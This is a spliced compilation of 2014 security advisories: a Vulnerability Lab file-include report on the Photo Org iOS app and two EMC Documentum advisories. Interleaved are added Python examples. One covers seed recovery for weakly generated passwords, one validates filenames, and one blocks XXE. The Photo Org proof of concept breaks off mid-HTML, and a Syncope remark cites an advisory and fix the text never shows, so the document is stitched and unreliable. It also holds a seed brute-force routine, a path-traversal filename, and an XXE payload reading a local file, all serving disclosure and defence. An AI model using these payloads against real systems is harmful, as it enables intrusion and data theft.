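Why a password drawn from an insecure Random is guessable, as an added example that is not Syncope's code: the weak generator below is seeded with an integer an attacker can bracket (a millisecond timestamp is the assumption used here; the advisory does not say how Syncope's generator was seeded), so the whole password collapses to a search over a few thousand seeds, while the strong variant draws from the OS CSPRNG and has no seed to recover. Python's random is a Mersenne Twister and java.util.Random is an LCG, but the recovery logic is the same. weak_password, strong_password and recover_seed are this example's own names.

```python
# Added example (not Syncope's code): guessable passwords from a seeded PRNG
# versus passwords from the OS CSPRNG. Time-based seeding is an assumption.
import random
import secrets
import string

ALPHABET = string.ascii_letters + string.digits
LENGTH = 12

def weak_password(seed: int, length: int = LENGTH) -> str:
    """Insecure: every character is a deterministic function of one integer seed."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))

def strong_password(length: int = LENGTH) -> str:
    """Secure: secrets.choice uses the OS CSPRNG; there is no seed to brute-force."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def recover_seed(observed: str, approx_ms: int, window_ms: int):
    """Attacker view: knowing roughly when a password was generated, try every
    candidate seed in [approx-window, approx+window]; return the matching seed
    or None. A 62**12 keyspace shrinks to 2*window+1 candidates."""
    for seed in range(approx_ms - window_ms, approx_ms + window_ms + 1):
        if weak_password(seed, len(observed)) == observed:
            return seed
    return None

if __name__ == "__main__":
    created_at_ms = 1404720000123          # constructed timestamp, not a real event
    victim_pw = weak_password(created_at_ms)
    # Attacker knows the creation time to within half a second.
    found = recover_seed(victim_pw, created_at_ms + 300, 500)
    print("weak password:", victim_pw, "recovered seed:", found)
    print("strong password:", strong_password(), "(no seed to recover)")
```

The fix in 1.1.8 replaces the insecure implementation; the general rule is that anything acting as a credential must come from a CSPRNG (java.security.SecureRandom, Python's secrets), never from a general-purpose PRNG, however it is seeded.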


Photo Org WonderApplications v8.3 iOS - File Include Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
Photo Org WonderApplications v8.3 iOS - File Include Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1277


Release Date:
=
2014-07-04


Vulnerability Laboratory ID (VL-ID):

1277


Common Vulnerability Scoring System:

7.1


Product & Service Introduction:
===
Create great photo albums and video diaries with PhotoOrg. Keep your photo 
album and video diary secured with passwords. 
Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa, 
Flickr and MySpace with family, friends 
and business associates.

Photo Editor with the following ability:
-Over eleven photo effects
-Four different photo enhancer
-Rotate and flip photo
-Crop photo
-Change photo brightness
-Change photo Contrast
-Change photo saturation
-Change photo sharpness
-Draw on photo with different colors
-Write text on your photo
-Remove red eyes
-Whiten photo
-Remove blemish on photo

Features:
-view your pictures and videos using your browser
-upload your picture and video using your browser
-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace
-upload multiple pictures to Facebook, Twitter, Flickr and MySpace
-Keep your photo and videos organized the way you like it
-Keep your photo and video secured with password
-copy your photo and video from anywhere and paste them into the application


( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a local file include 
vulnerability in the official WonderApplications Photo Org v8.3 iOS 
web-application.


Vulnerability Disclosure Timeline:
==
2014-07-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

WonderApplications
Product: Photo Org L - iOS Mobile Application 8.3


Exploitation Technique:
===
Local


Severity Level:
===
High


Technical Details & Description:

A local file include web vulnerability has been discovered in the official 
WonderApplications Photo Org v8.3 iOS web-application.
The local file include web vulnerability allows remote attackers to 
include unauthorized local file/path requests or system-specific 
path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `uploadMedia` 
(uploadfile) module. Remote attackers are able to inject 
own files with malicious `filename` values in the `uploadMedia` POST method 
request to compromise the mobile web-application. The local 
file/path include execution occurs in the index file/folder list context next 
to the vulnerable name/path value. The attacker is able 
to inject the local file request by usage of the available `wifi interface` for 
file exchange/share.

Remote attackers are also able to exploit the filename validation issue in 
combination with persistent injected script codes to execute 
different local malicious attacks requests. The attack vector is on the 
application-side of the wifi service and the request method to 
inject is POST. 

The security risk of the local file include web vulnerability is estimated as 
high with a cvss (common vulnerability scoring system) 
count of 7.1. Exploitation of the local file include web vulnerability requires 
no privileged web-application user account but low 
user interaction. Successful exploitation of the local file include web 
vulnerability results in mobile application or connected 
device component compromise.


Request Method(s):
[+] [POST]

Vulnerable Service(s):
[+] WonderApplications - WiFi Share 

Vulnerable Module(s):
[+] uploadMedia

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File/Folder Dir Listing 
(http://localhost:[port-x]/)


Proof of Concept (PoC):
===
The local file include web vulnerability can be exploited by remote attackers 
with low privileged application user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: WonderApplications (Photo & Video) - Index- & Sub-Categories

<html><head><style type=text/css>
ul {float:left; width:100%; padding:0; margin:0; list-style-type:none; }

a { float:left; width:6em; text-decoration:none; color:white;
background-color:purple; padding:0.2em 0.6em; border-right:1px solid white; }

a:hover {background-color:#ff3300}   li {display:inline}  table
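
The defence the advisory implies, as an added example that is not WonderApplications code: reject any client-supplied `filename` that is not a bare media name, and HTML-escape whatever is rendered into the index listing. The allowed extension set and the 128-character limit are assumed policy.

```python
"""Added example (not WonderApplications code): validate an uploaded
filename before storing it and escape it before listing it."""
import html
import re
import unicodedata
from pathlib import PurePosixPath

# One plain path component: letters, digits, dot, underscore, dash; no
# separators, no HTML metacharacters, no control characters, max 128 chars.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".mov", ".mp4"}  # assumed policy


class BadFilename(ValueError):
    """Raised when the client-supplied `filename` is not a bare media name."""


def sanitize_upload_name(raw: str) -> str:
    """Return `raw` unchanged if it is acceptable, else raise BadFilename.

    The advisory's bug is the `filename` field being trusted as a path and
    echoed into the index listing. Rejecting (not repairing) anything with a
    directory part or markup keeps the stored name and the listed name equal.
    """
    name = unicodedata.normalize("NFKC", raw)   # fold look-alikes such as fullwidth '/'
    if not SAFE_NAME.fullmatch(name):           # fullmatch: '$' would allow a trailing newline
        raise BadFilename(f"rejected upload name {raw!r}")
    if PurePosixPath(name).suffix.lower() not in ALLOWED_EXT:
        raise BadFilename(f"unsupported media type {raw!r}")
    return name


def listing_row(name: str) -> str:
    """Render one index row. Escaping happens here regardless of the upload
    check, so the listing stays safe even for a file that predates it."""
    safe = html.escape(name, quote=True)
    return f'<li><a href="/{safe}">{safe}</a></li>'


def is_rejected(raw: str) -> bool:
    """True when the upload name would be refused."""
    try:
        sanitize_upload_name(raw)
    except BadFilename:
        return True
    return False


if __name__ == "__main__":
    print(sanitize_upload_name("IMG_0001.JPG"))              # IMG_0001.JPG
    print(is_rejected("../../../private/secret.txt"))        # True
    print(listing_row("<b>x</b>.png"))
```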

ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities

2014-07-07 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities

EMC Identifier: ESA-2014-064

CVE Identifier:  CVE-2014-2513, CVE-2014-2514

Severity Rating: CVSS v2 Base Score: Refer below for scores for each CVE. 

Affected products:  
•   All EMC Documentum Content Server versions of 7.1
•   All EMC Documentum Content Server versions of 7.0
•   All EMC Documentum Content Server versions of 6.7 SP2
•   All EMC Documentum Content Server versions of 6.7 SP1
•   All EMC Documentum Content Server versions prior to 6.7 SP1

Summary:  
EMC Documentum Content Server contains fixes for privilege escalation 
vulnerabilities that could be potentially exploited by malicious users to 
compromise the affected system. 

Details: 
EMC Documentum Content Server may be susceptible to the following privilege 
escalation vulnerabilities:

•   CVE-2014-2513
Authenticated non-privileged users are allowed to execute arbitrary code with 
super user privileges via custom scripts. This is due to improper authorization 
checks being performed on the objects created. This could be potentially 
exploited to perform unauthorized actions on Content Server.
o   CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)

•   CVE-2014-2514
Authenticated non-privileged users are allowed to run save RPC commands with 
super user privileges on arbitrary objects.  This is due to improper user 
authorization checks and object type checks being performed on these objects. 
This could be potentially exploited by a malicious authenticated non-privileged 
user to perform unauthorized actions on Content Server including executing 
arbitrary code.
o   CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)

Resolution: 
EMC recommends all customers upgrade to one of the versions listed below at the 
earliest opportunity. 
•   EMC Documentum Content Server version 7.1 P06 and later
•   EMC Documentum Content Server version 7.0 P15 and later
•   EMC Documentum Content Server version 6.7 SP2 P15 and later
•   EMC Documentum Content Server version 6.7 SP1 P28 and later

Link to remedies:
Registered EMC Online Support customers can download patches and software from 
support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server



Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC Corporation distributes EMC Security Advisories, in order to bring to the 
attention of users of the affected EMC products, important security 
information. EMC recommends that all users determine the applicability of this 
information to their individual situations and take appropriate action. The 
information set forth herein is provided as is without warranty of any kind. 
EMC disclaims all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event, shall EMC or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if EMC or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of liability for consequential or incidental damages, 
so the foregoing limitation may not apply.

Product Security Response Center
security_al...@emc.com


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlO64voACgkQtjd2rKp+ALyPuACgxtfoIFxBqHeyFVi0eNwQA428
NaEAoKzmD8WcINVBGj/CYul8UON+Osyr
=wzFw
-END PGP SIGNATURE-


ESA-2014-057: EMC Documentum Foundation Services (DFS) XML External Entity (XXE) Vulnerability

2014-07-07 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2014-057: EMC Documentum Foundation Services (DFS) XML External Entity 
(XXE) Vulnerability

EMC Identifier: ESA-2014-057

CVE Identifier: CVE-2014-2510

Severity Rating: CVSS v2 Base Score: 8 (AV:N/AC:L/Au:S/C:C/I:P/A:P)

Affected products:  
•   EMC DFS 6.6 all service packs and patch versions prior to P39 
•   EMC DFS 6.7 SP1 all patch versions prior to P28
•   EMC DFS 6.7 SP2 all patch versions prior to P15
•   EMC My Documentum for Desktop 6.7.2
•   EMC My Documentum for Microsoft Outlook 6.7SP1, 6.7SP2, 6.7.3 & 6.7.1 
•   EMC CenterStage 1.2SP1 and 1.2SP2

Summary:  
EMC DFS may be vulnerable to XML External Entity (XXE) vulnerability which can 
be potentially leveraged by a malicious authenticated user to compromise the 
affected system. 

Details: 
EMC DFS may be vulnerable to XXE vulnerability due to the way the JAXB XML 
parser handles the incoming XML from an authenticated user.  This can be 
potentially leveraged by a malicious authenticated user to inject malicious 
data in the XML and retrieve information from sensitive files on the system. 
This may also be potentially leveraged to affect the Integrity and Availability 
of the system.  

Resolution:  
The following products contain the resolution to this issue:
•   EMC DFS 6.6 P39 and later
•   EMC DFS 6.7 SP1 P28 and later
•   EMC DFS 6.7 SP2 P15 and later 
•   EMC My Documentum for Desktop 6.7.2P15 and later
•   EMC My Documentum for Microsoft Outlook 6.7SP1P28, 6.7SP2P15, 6.7.1P29, 
6.7.3 (Hotfix)
•   EMC CenterStage 1.2SP2P06, 1.2SP1 (HotFix)

EMC recommends all customers upgrade to the fixed versions listed above at the 
earliest opportunity.

Link to remedies:
Customers can download using the links below for respective products:

EMC DFS 6.6:
https://emc.subscribenet.com/control/dctm/download?element=2808763

EMC DFS 6.7 SP2:
https://emc.subscribenet.com/control/dctm/download?element=4544131

EMC DFS 6.7 SP1
https://emc.subscribenet.com/control/dctm/download?element=3812321

My Documentum for Microsoft Desktop 6.7.2: 
https://emc.subscribenet.com/control/dctm/download?element=4300661

My Documentum for Microsoft Outlook 6.7SP1: 
https://emc.subscribenet.com/control/dctm/download?element=3832891

My Documentum for Microsoft Outlook 6.7SP2: 
https://emc.subscribenet.com/control/dctm/download?element=4544671

My Documentum for Microsoft Outlook 6.7.1: 
https://emc.subscribenet.com/control/dctm/download?element=4194721

My Documentum for Microsoft Outlook 6.7.3: (hot fix)
For the My Documentum for Microsoft Outlook 6.7.3  hot fix contact EMC Support

CenterStage 1.2SP1  (hot fix)
https://emc.subscribenet.com/control/dctm/download?element=3686131


CenterStage 1.2SP2 :
https://emc.subscribenet.com/control/dctm/download?cert_num=90816713&element=4880201


Credits:  EMC would like to thank Lukasz Plonka for reporting this issue.



Product Security Response Center
security_al...@emc.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlO64swACgkQtjd2rKp+ALyvvQCcCEZV0CM/NzXz61M+34IX+PzQ
JdMAn3Plqm5HPvFz7CfgPDX4iOo8xj0U
=ED+0
-END PGP SIGNATURE-
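
The general defence against the XXE class described in ESA-2014-057, as an added example that is not EMC or DFS code: an XXE payload must declare its entity in a DOCTYPE, so the service can refuse any client document carrying one before the real parser touches it. The request shapes and the `file:///example/secret.txt` target are constructed, not the DFS schema.

```python
"""Added example (not EMC or DFS code): refuse XML that could carry an
external entity before it reaches the application's parser."""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a client document declares a DOCTYPE (where XXE lives)."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an authenticated but untrusted client.

    The probe parser's DOCTYPE handler fires before any entity is declared
    or resolved, so no file is ever read on the client's behalf; the fix
    EMC shipped in DFS is not known to us and may differ.
    """
    probe = xml.parsers.expat.ParserCreate()

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {doctype_name!r} is not accepted from clients")

    probe.StartDoctypeDeclHandler = reject_doctype
    probe.Parse(data, True)          # UnsafeXML on a DOCTYPE, ExpatError on malformed input
    return ET.fromstring(data)       # DOCTYPE-free, so safe for the application parser


def is_rejected(data: bytes) -> bool:
    """True when the document is refused for carrying a DOCTYPE."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


# Constructed sample requests; the element names are illustrative only.
BENIGN = b"<getObject><objectId>090f4a1c</objectId></getObject>"
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE getObject [<!ENTITY xxe SYSTEM "file:///example/secret.txt">]>'
       b"<getObject><objectId>&xxe;</objectId></getObject>")

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN).find("objectId").text)   # 090f4a1c
    print(is_rejected(XXE))                                    # True
```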